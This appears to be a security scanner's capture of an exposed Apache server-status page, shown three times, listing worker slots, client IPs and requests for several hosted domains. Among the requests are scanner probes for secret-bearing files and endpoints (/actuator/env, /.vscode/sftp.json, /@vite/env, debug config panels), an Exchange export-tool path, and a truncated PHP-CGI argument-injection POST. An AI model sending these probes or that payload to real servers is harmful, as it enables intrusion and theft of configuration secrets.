146.190.63.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-23806250/254/507_ 15.00101929590.010.4029.66 146.190.63.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 1-23806250/246/523_ 15.00602138990.07.2112.00 146.190.63.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-23806260/105/613_ 8.842194458590.00.7212.23 172.68.135.66h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-23806260/121/625_ 8.85184034875310.03.2513.58 172.70.126.173h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-23806260/108/636_ 8.7722674498940.01.8310.37 172.64.200.223h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-23806260/103/590_ 8.89222124324350.01.2110.07 172.71.1.172h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-23806260/105/594_ 8.90123165150620.02.259.41 172.68.23.191h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-23806260/107/616_ 8.812204854380.03.1811.05 172.69.11.153h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-23806260/125/628_ 8.912205397140.01.1743.90 146.190.63.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/graphql HTTP/1.1 2-23806260/105/613_ 8.921305210420.01.288.73 146.190.63.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 2-23806260/119/670_ 8.92304775760.02.1514.34 146.190.63.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-23806260/100/582_ 8.911904789640.01.6510.98 146.190.63.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 3-23806270/103/1004_ 7.92609126940.01.3117.05 172.71.235.67h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-23806270/93/1008_ 7.861106678332970.00.7650.43 104.23.170.156h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-23806270/102/1005_ 7.801093258853800.01.2729.68 104.23.172.3h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-23806270/106/1033_ 8.02809752660.01.1116.74 146.190.63.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 3-23806270/94/962_ 7.88463069017210.011.0939.88 141.101.76.186h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-23806270/98/965_ 8.015108620300.00.7517.78 172.71.255.55h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-23806270/97/965_ 7.55513749186610.01.7318.86 104.23.209.90h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-23806270/98/921_ 7.9211008859430.01.2427.54 172.68.18.57h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-23806270/105/950_ 7.9410909144960.01.9516.83 172.71.239.98h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-23806270/102/944_ 7.99453898510260.00.6835.13 172.69.6.9h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-23807830/83/561_ 7.9220907378160.01.3328.18 104.23.237.107h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-23807830/76/543_ 8.528507277390.00.778.68 108.162.216.163h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-23807830/90/518_ 7.322953836748620.01.2410.53 162.158.49.88h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-23807830/79/535_ 6.35853448773670.01.0121.28 172.70.42.97h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-23807830/81/549_ 7.9220927344830.01.2323.45 104.23.237.107h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-23807830/79/534_ 8.477907316790.01.3119.63 172.71.234.229h2tandemsl.com:443idl
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a85802c2d068a1
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Monday, 01-Dec-2025 22:21:52 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 427 Parent Server MPM Generation: 426 Server uptime: 80 days 10 hours 50 seconds Server load: 0.05 0.08 0.08 Total accesses: 2512430 - Total Traffic: 77.4 GB - Total Duration: 1609798914 CPU Usage: u250.64 s271.43 cu13964.7 cs8015.45 - .324% CPU load .362 requests/sec - 11.7 kB/second - 32.3 kB/request - 640.734 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01709860no0yes010000 11709993no0yes010000 21709861no0yes010000 31709859no1yes19000 41709964no0yes010000 Sum501 149000 _______________________________W__________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-42617098600/112/45977_ 12.661850427342453020.03.591701.42 172.71.82.134h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-42617098600/114/45324_ 12.805760496677630.03.281457.45 162.158.123.32h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42617098600/116/45980_ 13.27576768229314770.02.661474.16 172.71.95.48h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42617098600/122/45543_ 13.965810223476250.02.791509.42 162.159.104.171h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42617098600/116/46251_ 12.72778438216568270.03.351567.97 162.158.163.247h2tandemsl.com:443idle, streams: 1/1/1/0/0 (open/recv/resp/push/rst) 0-42617098600/109/45783_ 13.52576463216154560.014.611565.49 104.22.7.132h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42617098600/94/45905_ 11.937830299338250.01.201459.60 104.22.7.132h2lcftech.es:443idle, streams: 1/1/1/0/0 (open/recv/resp/push/rst) 0-42617098600/105/45288_ 12.67778477225904760.02.061550.71 162.159.122.84h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42617098600/109/46064_ 13.887830221254810.04.771434.82 172.71.151.23h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42617098600/118/45862_ 12.69581919331129720.05.421666.30 162.158.107.42h2tandemsl.com:443idle, streams: 1/1/1/0/0 (open/recv/resp/push/rst) 1-42617099930/523/51762_ 37.88100236972320.041.601721.92 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 1-42617099930/499/52197_ 37.616216274541590.013.311685.46 162.158.154.38h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-42617099930/496/51831_ 37.87110292993490.025.011615.96 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 1-42617099930/547/51801_ 37.8890733956800.022.941580.00 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-42617099930/486/52195_ 37.8740436526800.044.721665.08 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 1-42617099930/508/53065_ 37.679386255161840.039.651623.50 162.158.154.249h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-42617099930/494/52104_ 37.8410420288169900.016.701575.00 172.71.191.41h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-42617099930/472/52626_ 37.802866233400570.016.341602.54 172.70.57.145h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-42617099930/484/50906_ 37.8930364858170.015.911432.28 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-42617099930/548/52406_ 37.8870496183250.012.531519.05 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-42617098610/51/49182_ 9.509480267238070.01.251468.67 172.68.134.4h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42617098610/43/48418_ 9.77953626407873340.01.651387.87 172.70.38.254h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42617098610/34/48914_ 8.74948387314200980.01.751517.24 104.23.211.44h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42617098610/39/48133_ 9.789240247037380.00.981440.49 172.69.39.164h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42617098610/33/48634_ 9.339752260230950.00.511604.72 104.22.23.32h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42617098610/42/48980_ 8.7494885253727100.00.851460.02 45.61.184.83http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42617098610/33/48508_ 9.7695334230362160.00.941467.38 188.114.111.68h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42617098610/46/48753_ 9.75919581262589240.02.181468.29 162.158.49.89h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42617098610/38/48674_ 8.64919520256541910.00.491642.33 172.70.142.51h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42617098610/39/49051_ 9.38948232277594930.00.881520.31 172.70.111.117h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-42617098590/346/56211_ 29.7810339157640.010.761730.60 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-42617098590/386/54918W 29.5700305204670.011.321540.41 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-42617098590/377/56190_ 29.3710340558050.010.671729.21 20.171.25.78http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-42617098590/356/55275_ 29.7760362300810.010.521840.80 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-42617098590/360/55644_ 29.7840289286880.011.131591.56 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-42617098590/372/55683_ 29.737422275501460.024.421762.84 172.69.138.95h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-42617098590/376/56103_ 29.7730310537240.017.911770.80 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 3-42617098590/365/55813_ 29.7710394485940.038.971796.02 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 3-42617098590/344/54937_ 29.7820928944780.013.731676.71 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-42617098590/352/56295_ 29.7770413982190.012.241675.73 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 4-42617099640/284/48820_ 24.65783227418454370.07.291598.00 108.162.245.252h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-42617099640/268/49113_ 24.615750291438460.07.551604.77 172.64.222.41h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-42617099640/278/49152_ 24.69709400249496680.09.661637.31 172.70.208.139h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-42617099640/306/49464_ 24.735801269698120.06.971545.82 172.68.27.126h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-42617099640/278/48
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a85802abb5fca5
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 29-Nov-2025 22:25:06 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 418 Parent Server MPM Generation: 417 Server uptime: 78 days 10 hours 4 minutes 3 seconds Server load: 0.26 0.19 0.12 Total accesses: 2456968 - Total Traffic: 75.4 GB - Total Duration: 1577093793 CPU Usage: u179.1 s242.33 cu13676.8 cs7836.86 - .324% CPU load .363 requests/sec - 11.7 kB/second - 32.2 kB/request - 641.886 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01486066no0yes010000 11486068no0yes010000 21486198no1yes010000 31486065no0yes010000 41486069no1yes19000 Sum502 149000 _______________________________________________W__ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-41714860660/10/45364_ 3.149885339707830.00.361677.47 104.23.195.36h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-41714860660/2/44762_ 1.769860494542010.00.261438.09 185.142.236.41http/1.1done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-41714860660/2/45331_ 3.146660227179190.00.011451.79 104.23.195.71h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-41714860660/4/44946_ 2.649871221543230.00.091488.44 162.158.170.238h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-41714860660/4/45656_ 3.266722214545480.00.011524.71 104.23.175.122h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-41714860660/3/45181_ 3.156661214564930.00.011538.24 104.23.195.69h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-41714860660/3/45361_ 3.109860297339110.00.261436.95 162.159.122.46h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-41714860660/4/44692_ 3.146710223850150.00.221530.02 104.23.195.84h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-41714860660/3/45498_ 3.159870219166550.00.001414.78 104.23.195.71h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-41714860660/4/45282_ 3.4620328965860.00.261642.42 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-41714860680/8/50237_ 3.3441132226543840.00.321655.38 162.158.122.176h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41714860680/4/50745_ 1.776711268347900.00.031644.90 47.130.1.2http/1.1done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-41714860680/6/50362_ 3.246722284460270.00.271555.03 172.70.93.71h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41714860680/5/50295_ 3.109601720115230.00.351530.89 172.69.74.130h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41714860680/6/50810_ 2.94666543425222970.00.551594.13 172.70.38.254h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41714860680/8/51510_ 3.1020244926080.00.041559.07 104.23.195.73h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41714860680/6/50622_ 3.104060278356290.00.821522.57 104.23.195.73h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41714860680/6/51257_ 3.4620227001120.00.031533.19 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 1-41714860680/3/49412_ 3.084060356386440.00.091391.72 162.158.23.172h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41714860680/2/50875_ 1.786668480611430.00.041483.44 47.130.1.2http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41714861980/88/47693_ 8.1710256347030.02.171426.97 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-41714861980/93/46921_ 8.104320397685460.01.141357.03 172.70.80.128h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41714861980/87/47605_ 8.1730306254480.01.811488.59 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 2-41714861980/80/46629_ 7.94328235154900.01.611400.15 172.68.134.234h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41714861980/92/46975_ 8.1441246081400.03.471568.80 172.71.120.74h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41714861980/101/47461_ 8.1740244292960.01.761381.01 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 2-41714861980/87/47015_ 8.1710222458090.02.641434.09 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-41714861980/145/47322_ 8.1800252386730.02.101432.91 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-41714861980/100/47258_ 8.1740246401950.01.491611.61 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 2-41714861980/89/47702_ 8.1630265747380.01.951463.34 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 3-41714860650/4/55338_ 3.339880334892860.00.031705.70 162.159.122.176h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41714860650/5/53948_ 3.6850300635350.00.031511.95 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 3-41714860650/3/55229_ 3.369883336123980.00.041684.56 172.69.74.233h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41714860650/2/54341_ 3.1850357328900.00.361802.55 162.158.88.128h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41714860650/2/54755_ 3.369874284839360.00.011568.14 104.23.195.93h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41714860650/1/54677_ 0.8654498270898250.00.031700.23 185.142.236.41h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-41714860650/3/55146_ 3.369920305809070.00.041735.35 104.23.195.93h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-41714860650/3/54929_ 1.819881390426570.00.031725.29 47.130.1.2http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41714860650/2/54079_ 3.369870924529730.00.001646.94 104.23.195.76h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-41714860650/4/55357_ 3.339880409437120.00.011628.31 162.158.23.100h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-41714860690/72/47825_ 7.1800413133460.00.911568.69 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql/api HTTP/1.1 4-41714860690/88/48035_ 7.2020286151890.02.391576.92 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 4-41714860690/88/48047_ 7.2010244758490.03.501598.92 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-41714860690/85/48256_ 7.05261264544040.02.411520.78 154.239.162.144http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-41714860690/94/47471_ 7.2000277596100.02.641467.32 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGE
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a858027ebd5f46
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 28-Nov-2025 00:45:55 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 408 Parent Server MPM Generation: 407 Server uptime: 76 days 12 hours 24 minutes 52 seconds Server load: 0.06 0.10 0.07 Total accesses: 2413547 - Total Traffic: 74.1 GB - Total Duration: 1520198700 CPU Usage: u260.35 s275.41 cu13275.1 cs7603.19 - .324% CPU load .365 requests/sec - 11.7 kB/second - 32.2 kB/request - 629.861 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01253980no0yes010000 11253981no0yes010000 21253983no0yes010000 31253979no1yes19000 41254168no1yes010000 Sum502 149000 __________________________________W_______________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-40712539800/330/44686_ 28.011272334782970.09.101655.74 172.70.214.20h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-40712539800/306/44111_ 28.8010489687180.013.151424.17 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 0-40712539800/310/44661_ 28.0113221616120.08.191434.67 172.70.211.206h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-40712539800/286/44252_ 28.553428216184780.021.261472.88 162.158.170.173h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-40712539800/320/45019_ 28.8000208520280.027.301508.10 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-40712539800/294/44494_ 27.9920209581360.026.931494.83 162.158.90.224h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-40712539800/309/44745_ 27.971270292671490.09.941412.99 104.23.251.58h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-40712539800/314/44046_ 28.8020218320220.010.721501.95 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 0-40712539800/312/44862_ 28.09132214214082900.07.971399.37 172.71.182.110h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-40712539800/304/44620_ 28.8031324633590.013.881627.45 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-40712539810/318/49756_ 30.2523333223507300.013.781644.85 74.7.241.187h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-40712539810/332/50281_ 30.9520263736440.06.501636.22 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 1-40712539810/318/49865_ 30.0710269297520.08.491529.07 172.70.211.26h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-40712539810/325/49781_ 30.1924660716928800.08.261505.63 104.23.251.2h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-40712539810/286/50346_ 29.4723280241377610.05.631579.39 172.70.175.197h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-40712539810/304/51026_ 30.9500237171570.08.361546.14 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 1-40712539810/316/50122_ 30.2024661273468100.07.101504.24 162.158.186.51h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-40712539810/362/50689_ 30.1623330223546120.014.021520.36 104.23.211.92h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-40712539810/313/48954_ 29.19232826349095130.06.651359.31 18.170.31.15http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-40712539810/355/50430_ 30.1902476893600.08.461467.57 104.23.251.180h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-40712539830/167/46989_ 25.35364250909050.03.381409.57 5.135.27.193http/1.1barrerasdecontencion.com:443POST /wp-login.php HTTP/1.1 2-40712539830/226/46155_ 24.881330391567700.03.941341.23 162.159.106.131h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-40712539830/198/46879_ 25.513090300632380.04.731446.47 162.159.122.64h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-40712539830/199/45990_ 25.6130229759270.03.931377.79 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql HTTP/1.1 2-40712539830/182/46248_ 24.813041205231070.03.991549.61 162.158.186.185h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-40712539830/192/46761_ 24.801281238772800.04.051364.62 172.70.215.95h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-40712539830/270/46262_ 24.061280216681750.07.531407.56 172.71.191.50h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-40712539830/202/46584_ 24.813040246047370.05.431414.10 172.64.217.37h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-40712539830/184/46502_ 25.571330240080860.04.771571.54 162.159.122.4h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-40712539830/215/46971_ 25.6100260624580.04.871446.65 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-40712539790/368/54690_ 34.782391330184490.015.861691.29 162.158.79.145h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-40712539790/386/53291_ 34.740501295139340.012.711496.77 172.70.108.229h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-40712539790/346/54598_ 34.7410329263840.011.711671.33 162.159.122.111h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-40712539790/374/53675_ 34.8010349527360.010.011790.14 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 3-40712539790/401/54004W 34.8000278605270.08.571553.41 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-40712539790/362/53995_ 34.8110263811920.015.611684.64 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 3-40712539790/410/54397_ 34.8100300344850.09.651717.82 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-40712539790/358/54277_ 34.8100383538920.015.131707.28 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-40712539790/360/53424_ 34.80116920366420.010.171631.11 162.158.122.98h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-40712539790/406/54710_ 34.8010405724150.010.751611.80 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 4-40712541680/337/46031_ 30.1900401473480.07.761454.18 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-40712541680/334/46151_ 30.1910274655670.09.311509.32 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 4-40712541680/292/46203_ 30.1900232801480.06.241555.25 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 